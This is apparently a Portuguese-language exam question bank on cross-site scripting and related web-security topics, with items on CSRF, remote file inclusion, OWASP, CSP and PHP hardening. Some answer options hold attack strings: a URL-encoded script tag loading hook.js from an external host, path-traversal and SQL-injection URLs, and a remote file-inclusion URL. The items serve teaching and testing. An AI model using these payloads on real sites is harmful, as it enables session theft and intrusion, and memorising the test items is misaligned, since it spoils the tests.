Questões de Concurso sobre Cross-Site-Scripting (XSS)

 
 
Disciplina
Assunto 1
Banca
Instituição
Cargo
Ano
Carreira
Área de formação
Escolaridade
Dificuldade
 
Comentários:
Professores
Alunos
Meus Comentários
Vídeo
 
Minhas questões:
Resolvidas
Não resolvidas
Certas
Erradas
 
Tipo de questão:
Certo e errado
Múltipla escolha
Incluir questões:
Anuladas
Desatualizadas
 
Questões:
Todas as questões
 
Filtro simplificado
 
Questões
Todas as questões
 
69 questões encontradas
Questões por página
20
Mais recentes
 

Durante um hackathon de segurança, uma das equipes construiu rapidamente uma funcionalidade de comentários para um sistema de compras.


Para permitir o uso de formatação HTML nos comentários, o desenvolvedor implementou o seguinte template:


Imagem associada para resolução da questão


Após algum tempo, um usuário publicou o seguinte texto no conteúdo do comentário:


Imagem associada para resolução da questão


Outros usuários que acessaram a página tiveram transferências não autorizadas de suas contas.


Com base nesse cenário, qual opção explica a falha explorada, indicando o tipo de ataque e como corrigi-la sem perder a possibilidade de exibir algum HTML formatado nos comentários?


A

O ataque é um CSRF, pois o script realiza uma requisição POST autenticada. A correção é ativar o middleware de proteção CSRF e validar o token de cada requisição.


B

O ataque é um XSS, pois o código do comentário é executado no navegador de outros usuários. A correção é filtrar e limpar o HTML permitido (mantendo apenas tags seguras, como <b> ou <i>).


C

O ataque é um XSS, pois o script é executado logo após o envio do comentário. A correção é utilizar o auto-escape com a exibição do comentário realizada pelo código:

<div>{{ ultimo_comentario }}</div>


D

É uma falha de validação de entrada por CSRF, pois o sistema não restringe o conteúdo do comentário. A correção é bloquear qualquer HTML e exibir apenas texto puro.

Os ataques de Cross-Site Scripting (XSS) são um tipo de injeção em que scripts maliciosos são inseridos em sites legítimos e confiáveis. Assinale o item que apresenta uma evidência relacionada a um ataque de XSS.


A

https://lojadebolo.com.br/produtos#prod=file:///etc/passwd


B

https://lojadebolo.com.br/produtos#prod=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fet c/config


C

https://lojadebolo.com.br/produtos#prod=1'%20or%20'1'%20=%20'1&password=1'%20or %20'1'%20=%20'1


D

https://lojadebolo.com.br/produtos#prod=chocolate%3Cscript%20src%3D%22https%3A%2F% 2Frepo123.ru%2Fhook.js%22%3E%3C%2Fscript%3E

No contexto de conceitos e modos de utilização do sistema operacional Chrome OS, o sandboxing é um mecanismo fundamental que isola processos e restringe seus privilégios, limitando o impacto de eventuais vulnerabilidades em abas do navegador, aplicativos e extensões. A esse respeito, analise as afirmativas a seguir:


I.O Chrome OS executa cada aba do navegador Chrome, bem como aplicativos (incluindo Android apps e PWAs), em processos separados e isolados, com privilégios mínimos, de forma a reduzir significativamente o acesso direto a recursos do sistema operacional.

II.O sandboxing no Chrome OS impede que um processo comprometido tenha acesso irrestrito à memória ou aos recursos de outros processos e do sistema, constituindo uma das principais camadas de defesa do sistema.

III.O mecanismo de sandboxing do Chrome é desativado automaticamente quando o usuário acessa o sistema por meio do modo convidado (Guest Mode ou "Navegar como convidado").


É correto o que se afirma em:


A

I, II e III.


B

II e III, apenas.


C

I, apenas.


D

I e II, apenas.


E

III, apenas.

Ao realizar uma análise de riscos, um analista identificou que a vulnerabilidade de Cross-Site Scripting em um portal de serviços tem uma probabilidade de ocorrência classificada como média e um impacto potencial classificado como Alto. A organização utiliza uma matriz de riscos 5X5 (Muito Baixa, Baixa, Média, Alta, Muito Alta). Para tratar este risco, foi implementado um WAF, que reduz a probabilidade de exploração de Média para Baixa.


Considerando a abordagem da ISO/IEC 27005, o termo técnico para o risco após a implementação do WAF e antes da decisão final de aceitação ou tratamento adicional é


A

Risco Inerente


B

Risco Bruto


C

Risco Aceitável


D

Risco Residual


E

Risco Mitigado

O OWASP Top 10 classifica o Cross-Site Scripting (XSS) como uma das vulnerabilidades mais comuns em aplicações web, especialmente no front-end. Assinale a alternativa abaixo que descreve a principal estratégia para mitigar o risco de XSS em um aplicativo web.


A

Validar, filtrar e escapar corretamente os dados inseridos pelo usuário antes de exibi-los em páginas HTML.


B

Utilizar sanitização de entrada baseada em regex que permite a execução de scripts legítimos, mas bloqueia as tags de script maliciosas.


C

Permitir que os dados do usuário sejam diretamente inseridos em elementos HTML, desde que o conteúdo seja criptografado na transmissão.


D

Empregar a técnica de Content Security Policy (CSP) para permitir a execução de qualquer script externo, desde que suas fontes sejam especificadas e seguras.

Analise as afirmativas abaixo sobre XSS.


1. Atua sobre vulnerabilidades da política de mesma origem (SOP), muitas vezes contornando este conceito de política de segurança.

2. Funciona injetando binários server-side que influenciam como as páginas web do lado do cliente são geradas.

3. XSS atua primariamente em aplicações da web, nas quais o uso de Javascript e HTML é predominante.


Assinale a alternativa que indica todas as afirmativas corretas.


A

É correta apenas a afirmativa 2.


B

São corretas apenas as afirmativas 1 e 2.


C

São corretas apenas as afirmativas 1 e 3.


D

São corretas apenas as afirmativas 2 e 3.


E

São corretas as afirmativas 1, 2 e 3.

A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.


Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.


Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php


O teste foi realizado utilizando o seguinte endereço:


http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php


Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.


O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o


A

LFI – Local File Inclusion.


B

XSS – Cross-Site Scripting.


C

SQL Injection.


D

RFI – Remote File Inclusion.


E

FPD – Full Path Disclosure.

No desenvolvimento de aplicações web com PHP, a segurança é uma preocupação primordial para prevenir vulnerabilidades comuns como Cross-Site Scripting (XSS) e SQL Injection. Acerca das práticas de segurança em PHP, registre V, para as afirmativas verdadeiras, e F, para as falsas:


(__)Para prevenir ataques de SQL Injection de forma eficaz, a melhor prática é utilizar declarações preparadas (prepared statements) com APIs como PDO (PHP Data Objects) ou MySQLi, em vez de concatenar ou interpolar variáveis diretamente em strings de consulta SQL.

(__)A função mysql_real_escape_string(), apesar de ainda funcional, é considerada obsoleta e insegura para prevenir SQL Injection em versões modernas do PHP, pois pertence à extensão mysql_ que foi removida no PHP 7.

(__)A utilização da função htmlspecialchars() é uma medida crucial para mitigar ataques de Cross-Site Scripting (XSS) refletido e armazenado, pois ela converte caracteres especiais, como < e >, em suas respectivas entidades HTML, impedindo que o navegador interprete o dado como código.

(__)Para proteger contra ataques de Cross-Site Request Forgery (CSRF), é suficiente verificar o cabeçalho HTTP Referer para garantir que a solicitação se origina do mesmo domínio, não sendo necessária a implementação de tokens de sincronização (synchronizer tokens).


Após análise, assinale a alternativa que apresenta a sequência correta dos itens acima, de cima para baixo:


A

V, F, V, V.


B

V, V, V, F.


C

V, V, V, V.


D

F, F, V, V.


E

V, F, F, F.

A respeito do ataque Cross-Site Scripting (XSS), considere o cenário fictício a seguir:


Um site permite que os usuários insiram comentários em uma página de blog.


Um usuário mal-intencionado insere um código JavaScript no campo de comentários e percebe que, quando outros usuários acessam a página, esse script é executado no navegador deles.


Com base neste cenário, é CORRETO afirmar:


A

Um ataque XSS não representa nenhum risco, pois ele só pode exibir alertas inofensivos no navegador.


B

O ataque XSS pode ser utilizado para roubar cookies de sessão de usuários, o que pode levar à elevação de privilégios.


C

O ataque XSS pode ser completamente evitado apenas restringindo o uso de cookies.


D

Cross-Site Scripting (XSS) é um ataque que compromete diretamente a integridade do sistema operacional do servidor, permitindo o controle remoto do servidor.


E

Para que o XSS funcione, o invasor precisa ter acesso físico ao dispositivo da vítima.

A metodologia OWASP (open web application security project) propõe um modelo de escopo de segurança restrito às etapas finais do desenvolvimento de software, focando principalmente na detecção e na mitigação de vulnerabilidades em produtos já prontos.


C

Certo


E

Errado

Segundo a OWASP, os três elementos-chave para uma robusta proteção de dados em aplicações Web são


A

acessibilidade, consistência e durabilidade.


B

confidencialidade, integridade e disponibilidade.


C

autenticação dupla, integridade e segurança lógica.


D

consistência forte, integralidade e segurança virtual.


E

criptografia, validação em vários fatores e auditabilidade.

As aplicações web são suscetíveis a diversos tipos de ataques e é importante saber qual medida adotar para prevenir cada um deles.


Assinale a alternativa que apresenta CORRETAMENTE qual tipo de ataque pode ser prevenido com o uso de cabeçalhos de segurança HTTP, como Content-Security-Policy:


A

SQL Injection.


B

Eavesdropping.


C

Cross-Site Scripting.


D

Ataque de força bruta.

Considere a seguinte URL.


Imagem associada para resolução da questão


Se nenhum outro controle estiver em vigor, um atacante pode simplesmente modificar o valor id para visualizar outros registros da aplicação em questão, sendo esse um exemplo de referência insegura a objetos que leva ao escalonamento horizontal de privilégios.


C

Certo


E

Errado

Aplicações Web são


A

aplicações criadas unicamente para disponibilizar conteúdo estático.


B

programas desenvolvidos para executar processos de negócios mediante requisições.


C

aplicativos que rodam exclusivamente em arquiteturas de alta escalabilidade como CGI (Common Gateway Interface).


D

programas com arquitetura exclusivamente em duas camadas e equivalente a arquitetura monolítica.


E

programas que rodam na arquitetura J2EE apesar de restringir a escalabilidade das aplicações.

Cross-site scripting é um tipo clássico de CVE (Common Vulnerabilities and Exposures) que permite a neutralização de entradas com parâmetros inadequados para um sistema Web.


C

Certo


E

Errado

Em um computador, a execução remota de código (RCE) geralmente é permitida devido


A

à validação insuficiente de entrada de dados.


B

à segmentação de rede à qual o computador está conectado.


C

ao fato de a arquitetura do sistema ser de 64 bits.


D

ao fato de o computador possuir sistema de arquivo com RAID.


E

ao tipo de gerenciamento seguro de memória.

A metodologia OWASP é amplamente adotada por profissionais de segurança da informação e desenvolvedores de software como referência para proteção de aplicações web. Com base em seus princípios, objetivos e contribuições para a segurança, assinale a alternativa que descreve corretamente o propósito da OWASP.


A

É uma empresa privada que vende soluções comerciais de segurança para aplicativos móveis.


B

É uma comunidade aberta que promove boas práticas e oferece recursos gratuitos para identificar, prevenir e corrigir vulnerabilidades em aplicações web.


C

É um conjunto de normas obrigatórias internacionais para certificação de data centers em segurança.


D

É uma metodologia utilizada exclusivamente por bancos para prevenir ataques a sistemas financeiros.


E

É um repositório de algoritmos criptográficos aprovados por órgãos de defesa cibernética.

Segundo CERT.BR(2012), cookies são pequenos arquivos que são gravados em seu computador quando você acessa sites na Internei e que são reenviados a estes mesmos sites quando novamente visitados. São usados para manter informações sobre você, como carrinho de compras, lista de produtos e preferências de navegação. Analise as afirmativas abaixo e assinale a opção que apresenta somente os riscos relacionados ao uso de cookies.


A

Invasão de perfil digital, computador desligar sozinho e coleta de informações pessoais.


B

Disponibilização de informações confidenciais, exploração de vulnerabilidades e furto de identidade.


C

Danos à imagem e à reputação, compartilhamento de informações e janelas de pop-up aparecendo de forma inesperada.


D

Compartilhamento de informações, coleta de hábitos de navegação e autenticação automática.


E

Arquivos de logs serem apagados sem motivo aparente, acesso a conteúdos impróprios ou ofensivos e vazamento de informações.

Um sistema precisa atualizar dinamicamente uma lista de pedidos sem recarregar a página. O desenvolvedor implementou:


fetch('/api/pedidos')

.then(res => res.text())

.then(data => {

document.getElementById('lista').innerHTML = data;

});


Sobre riscos à segurança e boas práticas de programação é correto afirmar que:


A

a abordagem está correta, pois innerHTML sempre é seguro para dados retornados pela API, mesmo sendo uma API de terceiros.


B

injetar diretamente a resposta no DOM sem sanitização expõe o sistema a XSS; a resposta deveria ser JSON parseado e renderizado de forma segura.


C

o uso de .text() é obrigatório, pois APIs não retornam JSON.


D

o fetch deveria usar o método GET apenas se a API fosse pública.


E

o problema central é não usar XMLHttpRequest em vez de fetch.

 
 
Gerar simulado